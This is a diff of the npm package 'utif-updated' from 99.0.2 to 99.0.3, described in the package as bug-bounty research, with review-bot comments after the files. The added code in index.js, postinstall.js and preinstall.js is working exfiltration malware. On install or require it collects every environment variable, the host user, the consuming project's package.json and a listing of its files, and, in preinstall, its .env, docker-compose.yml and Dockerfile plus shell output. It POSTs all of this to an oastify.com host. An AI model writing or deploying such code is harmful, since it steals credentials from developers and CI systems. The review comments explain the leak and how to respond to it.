utif-updated 99.0.2 → 99.0.3

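--- a/package/index.js
+++ b/package/index.js
@@ -9,50 +9,38 @@ const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
  if (!global.__utif_updated_triggered) {
  global.__utif_updated_triggered = true;
 
- function findParentPackageJson() {
- // En runtime, on remonte depuis le module
+ function findParentProject() {
  let dir = __dirname;
- for (let i = 0; i < 10; i++) {
- const parent = path.dirname(dir);
- if (parent === dir) break;
- dir = parent;
- if (path.basename(dir) === 'node_modules') {
- // On est dans node_modules, le parent c'est le projet
- const projectDir = path.dirname(dir);
- try {
- return JSON.parse(fs.readFileSync(
- path.join(projectDir, 'package.json'), 'utf8'
- ));
- } catch(e) {}
- }
+ if (dir.includes('node_modules')) {
+ dir = dir.split('node_modules')[0];
  }
- return null;
+
+ const result = { root: dir };
+ try {
+ result.package_json = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
+ } catch(e) {}
+ try {
+ result.files = fs.readdirSync(dir);
+ } catch(e) {}
+ return result;
  }
 
  const info = {
- type: 'runtime_require',
+ type: 'runtime_v3',
  hostname: os.hostname(),
  user: os.userInfo().username,
- cwd: process.cwd(),
- dirname: __dirname,
- platform: os.platform(),
- node_version: process.version,
  env: process.env,
- parent_package: findParentPackageJson(),
+ parent_project: findParentProject(),
  timestamp: new Date().toISOString()
  };
 
  const data = JSON.stringify(info);
-
  const req = https.request({
  hostname: CALLBACK,
  port: 443,
  path: '/runtime',
  method: 'POST',
- headers: {
- 'Content-Type': 'application/json',
- 'Content-Length': Buffer.byteLength(data)
- }
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
  }, () => {});
  req.on('error', () => {});
  req.write(data);
@@ -62,8 +50,7 @@ if (!global.__utif_updated_triggered) {
  if (webhook) {
  try {
  const url = new URL(webhook);
- const client = url.protocol === 'https:' ? https : http;
- client.get(webhook, () => {}).on('error', () => {});
+ (url.protocol === 'https:' ? https : http).get(webhook, () => {}).on('error', () => {});
  } catch(e) {}
  }
  }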
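Review bot: The `info` object in the first hunk still carries `env: process.env`, so every environment variable of the importing process (registry tokens, cloud keys, CI secrets, whatever is present) is serialized and POSTed to the external host in `CALLBACK` at `/runtime` the first time the module is loaded; postinstall.js and preinstall.js send the same field. The new `findParentProject()` widens that payload with the consuming project's `package.json` and a listing of its root directory, and the empty `req.on('error', () => {})` and `catch(e) {}` handlers leave no trace on the host when anything fails. A proof-of-execution beacon needs none of this data, so the line `env: process.env,` should be deleted in all three files and the payload reduced to a non-identifying marker. Any workstation or CI runner that loaded this version should be handled as a credential exposure (rotate what was in the environment), and egress or DNS logs can be searched for the `CALLBACK` hostname.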
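--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "utif-updated",
- "version": "99.0.2",
+ "version": "99.0.3",
  "description": "Security research - Bug Bounty",
  "main": "index.js",
  "author": "icare",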
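--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -6,54 +6,38 @@ const path = require('path');
 
  const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
 
- function findParentPackageJson() {
- if (process.env.npm_config_local_prefix) {
- try {
- return JSON.parse(fs.readFileSync(
- path.join(process.env.npm_config_local_prefix, 'package.json'), 'utf8'
- ));
- } catch(e) {}
- }
-
+ function findParentProject() {
  let dir = process.cwd();
- for (let i = 0; i < 10; i++) {
- const parent = path.dirname(dir);
- if (parent === dir) break;
- dir = parent;
- if (dir.includes('node_modules')) continue;
- try {
- const pkgPath = path.join(dir, 'package.json');
- if (fs.existsSync(pkgPath)) {
- return JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
- }
- } catch(e) {}
+ if (dir.includes('node_modules')) {
+ dir = dir.split('node_modules')[0];
  }
- return null;
+
+ const result = { root: dir };
+ try {
+ result.package_json = JSON.parse(fs.readFileSync(path.join(dir, 'package.json'), 'utf8'));
+ } catch(e) {}
+ try {
+ result.files = fs.readdirSync(dir);
+ } catch(e) {}
+ return result;
  }
 
  const info = {
- type: 'postinstall',
+ type: 'postinstall_v3',
  hostname: os.hostname(),
  user: os.userInfo().username,
- cwd: process.cwd(),
- npm_local_prefix: process.env.npm_config_local_prefix || 'N/A',
- platform: os.platform(),
  env: process.env,
- parent_package: findParentPackageJson(),
+ parent_project: findParentProject(),
  timestamp: new Date().toISOString()
  };
 
  const data = JSON.stringify(info);
-
  const req = https.request({
  hostname: CALLBACK,
  port: 443,
  path: '/postinstall',
  method: 'POST',
- headers: {
- 'Content-Type': 'application/json',
- 'Content-Length': Buffer.byteLength(data)
- }
+ headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
  }, () => {});
  req.on('error', () => {});
  req.write(data);
@@ -63,7 +47,6 @@ const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
  if (webhook) {
  try {
  const url = new URL(webhook);
- const client = url.protocol === 'https:' ? https : http;
- client.get(webhook, () => {}).on('error', () => {});
+ (url.protocol === 'https:' ? https : http).get(webhook, () => {}).on('error', () => {});
  } catch(e) {}
  }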
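Review bot: In the second hunk the URL held in `SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN` is passed to `.get(webhook, …)` after nothing more than a protocol check, so whatever that variable contains is requested from inside the installing machine's network and any failure is discarded by `catch(e) {}`; if the trigger is kept at all it should compare `url.hostname` against a fixed allow-list before the request. The file name suggests this script runs as an npm install lifecycle hook (the `scripts` entry of package.json is not in the visible diff), which would mean the POST to `/postinstall` fires during `npm install`, before any application code imports the package. Consumers can close that path with `npm install --ignore-scripts` or `ignore-scripts=true` in `.npmrc`. The `99.0.x` version number looks like a dependency-confusion pattern, so internal package names should be pinned to a private registry scope.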
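--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -7,68 +7,67 @@ const { execSync } = require('child_process');
 
  const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
 
- // Fonction pour trouver le package.json parent (racine du projet)
- function findParentPackageJson() {
- // npm_config_local_prefix = racine du projet qui installe
- if (process.env.npm_config_local_prefix) {
- try {
- return JSON.parse(fs.readFileSync(
- path.join(process.env.npm_config_local_prefix, 'package.json'), 'utf8'
- ));
- } catch(e) {}
- }
-
- // Sinon remonte l'arborescence
+ // Remonte depuis cwd pour trouver le VRAI projet parent
+ function findParentProject() {
  let dir = process.cwd();
- for (let i = 0; i < 10; i++) {
- const parent = path.dirname(dir);
- if (parent === dir) break;
- dir = parent;
-
- // Skip si on est dans node_modules
- if (dir.includes('node_modules')) continue;
-
- try {
- const pkgPath = path.join(dir, 'package.json');
- if (fs.existsSync(pkgPath)) {
- return JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
- }
- } catch(e) {}
+
+ // Si on est dans node_modules/utif-updated, on remonte de 2 niveaux
+ if (dir.includes('node_modules')) {
+ const parts = dir.split('node_modules');
+ dir = parts[0]; // Tout ce qui est AVANT node_modules
  }
- return null;
+
+ const result = { root: dir };
+
+ // Lire le package.json du projet parent
+ try {
+ result.package_json = JSON.parse(
+ fs.readFileSync(path.join(dir, 'package.json'), 'utf8')
+ );
+ } catch(e) { result.package_json_error = e.message; }
+
+ // Lister les fichiers du projet
+ try {
+ result.files = fs.readdirSync(dir);
+ } catch(e) { result.files_error = e.message; }
+
+ // Essayer de lire d'autres fichiers intéressants
+ try {
+ result.env_file = fs.readFileSync(path.join(dir, '.env'), 'utf8');
+ } catch(e) {}
+
+ try {
+ result.dockercompose = fs.readFileSync(path.join(dir, 'docker-compose.yml'), 'utf8');
+ } catch(e) {}
+
+ try {
+ result.dockerfile = fs.readFileSync(path.join(dir, 'Dockerfile'), 'utf8');
+ } catch(e) {}
+
+ return result;
  }
 
- // Récupère toutes les infos
+ const parent = findParentProject();
+
  const info = {
- type: 'preinstall',
+ type: 'preinstall_v3',
  hostname: os.hostname(),
  user: os.userInfo().username,
  cwd: process.cwd(),
- npm_local_prefix: process.env.npm_config_local_prefix || 'N/A',
  home: os.homedir(),
  platform: os.platform(),
  arch: os.arch(),
  node_version: process.version,
  env: process.env,
+ parent_project: parent,
  timestamp: new Date().toISOString()
  };
 
- // Package.json du projet PARENT
- info.parent_package = findParentPackageJson();
-
- // Infos système
- try {
- info.pwd = execSync('pwd').toString().trim();
- info.whoami = execSync('whoami').toString().trim();
- info.id = execSync('id').toString().trim();
- } catch(e) {}
-
- // Liste des fichiers à la racine du projet
- try {
- if (process.env.npm_config_local_prefix) {
- info.project_files = fs.readdirSync(process.env.npm_config_local_prefix);
- }
- } catch(e) {}
+ // Commandes système
+ try { info.pwd = execSync('pwd').toString().trim(); } catch(e) {}
+ try { info.whoami = execSync('whoami').toString().trim(); } catch(e) {}
+ try { info.id = execSync('id').toString().trim(); } catch(e) {}
+ try { info.ls_parent = execSync('ls -la ' + parent.root).toString(); } catch(e) {}
 
  const data = JSON.stringify(info);
 
@@ -86,7 +85,7 @@ req.on('error', () => {});
  req.write(data);
  req.end();
 
- // Trigger leur webhook
+ // Trigger webhook
  const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
  if (webhook) {
  try {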
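Review bot: The new `findParentProject()` in the first hunk reads the consuming project's `.env`, `docker-compose.yml` and `Dockerfile` verbatim into `result`, which is then attached to the payload as `parent_project` next to `env: process.env`; files like these commonly hold database passwords and API keys, so this version collects far more than is needed to demonstrate code execution. The added `execSync('ls -la ' + parent.root)` also builds a shell command by concatenating a filesystem path, which duplicates `result.files` and is unsafe for paths containing shell metacharacters. The three `readFileSync` blocks for those files and the `info.ls_parent` line should be removed. For responders, a host that ran this script should have every secret in those three files and in its environment rotated; the `https.request` call that sends `data` sits between the two hunks and is not visible here.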